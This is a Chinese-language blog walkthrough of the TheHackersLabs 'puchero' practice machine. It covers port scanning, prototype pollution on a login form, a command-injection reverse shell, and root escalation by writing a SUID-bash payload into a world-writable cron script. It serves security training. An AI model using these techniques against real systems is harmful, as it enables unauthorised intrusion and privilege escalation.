Pepster'Blog
TheHackersLabs-puchero靶机详解WP
城南花已开 Lv5
  2025-01-16 20:41:29   2025-01-22 19:49:12    1.1k 字  5 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.154  08:00:27:e4:e8:6b       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e0:e6:12       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.052 seconds (124.76 hosts/sec). 4 responded
export ip=192.168.60.154
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.154:22
Open 192.168.60.154:80
Open 192.168.60.154:3333
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 20:42 CST
Initiating ARP Ping Scan at 20:42
Scanning 192.168.60.154 [1 port]
Completed ARP Ping Scan at 20:42, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:42
Completed Parallel DNS resolution of 1 host. at 20:42, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:42
Scanning 192.168.60.154 [3 ports]
Discovered open port 22/tcp on 192.168.60.154
Discovered open port 80/tcp on 192.168.60.154
Discovered open port 3333/tcp on 192.168.60.154
Completed SYN Stealth Scan at 20:42, 0.05s elapsed (3 total ports)
Nmap scan report for 192.168.60.154
Host is up, received arp-response (0.00045s latency).
Scanned at 2025-01-16 20:42:09 CST for 0s

PORT     STATE SERVICE   REASON
22/tcp   open  ssh       syn-ack ttl 64
80/tcp   open  http      syn-ack ttl 64
3333/tcp open  dec-notes syn-ack ttl 64
MAC Address: 08:00:27:E4:E8:6B (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

访问一下80端口,为默认apache的页面

扫一下目录,没什么收获

入口

换个方向,访问3333端口

发现是个登录表单

image

原型链污染

使用默认账户密码admin登入,可以进行下载远程的链接,我感觉类似wget的东西吧

不过当你submit会提示you are not admin

我估计要利用原型链污染之类的,修改admin的值

image

果不其然,具体的可以参考TheHackersLabs-TheOffice靶机详解WP | Pepster’Blog

image

尝试submit,提交我的rev.php但不会被解析,download就会下到本地

应该是存到某个目录下面了,但不知道路径

尝试命令注入是否有效,我尝试了nc,我猜测大概率没有nc

利用busybox可以成功反弹shell,不知道为啥会断掉

image

1

用$()包括就可以了,让bash执行一下

image

用户提权

1
2
3
4
5
6
7
8
9
10
❯ pwncat-cs -lp 4444
[21:25:39] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[21:26:10] received connection from 192.168.60.154:52816                                                                                    bind.py:84
[21:26:10] 0.0.0.0:4444: normalizing shell path                                                                                         manager.py:957
           0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
[21:26:11] 192.168.60.154:52816: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) puchero@puchero:/var/www/html/PrototypePollution-Lab/prototypePoluttion$ cat /etc/passwd|grep bin/bash
root:x:0:0:root:/root:/bin/bash
puchero:x:1000:1000::/home/puchero:/bin/bash

发现puchero用户,哎不对我拿到的shell就是这个用户的,竟然不是www-data,比较友好,还有opt下有个脚本文件

先拿个user再说

1
2
3
4
5
6
(remote) puchero@puchero:/tmp$ cd ~
(remote) puchero@puchero:/home/puchero$ cat user.txt
7af5b2ba4805dbee057ea57dd5b1d089
(remote) puchero@puchero:/home$ cd /opt/
(remote) puchero@puchero:/opt$ ls
grasioso.sh

Root提权

猜测可能会定时执行,上传个pspy64看一下

1
2025/01/16 14:31:01 CMD: UID=0     PID=1289   | /bin/sh -c /bin/bash -c /opt/grasioso.sh

我看了一下文件权限777,那没事了改文件就完事了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
(remote) puchero@puchero:/opt$ ls -al
total 8
drwxr-xr-x  2 root root    4096 may 22  2024 .
drwxr-xr-x 18 root root    4096 abr 12  2024 ..
-rwxrwxrwx  1 root puchero    0 may 22  2024 grasioso.sh
(remote) puchero@puchero:/opt$ echo -e "cp /bin/bash /tmp/sh\nchmod +s /tmp/sh">grasioso.sh
(remote) puchero@puchero:/opt$ cat grasioso.sh
cp /bin/bash /tmp/sh
chmod +s /tmp/sh
(remote) puchero@puchero:/tmp$ ./sh -p
(remote) root@puchero:/tmp# whoami
root
(remote) root@puchero:/tmp# cat /root/root.txt
bdf8c3a56b3c61670c093a8bff406f6e
  1. 信息收集
    1. 服务探测
    2. 入口
    3. 原型链污染
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k
  1. 信息收集
    1. 服务探测
    2. 入口
    3. 原型链污染
  2. 用户提权
  3. Root提权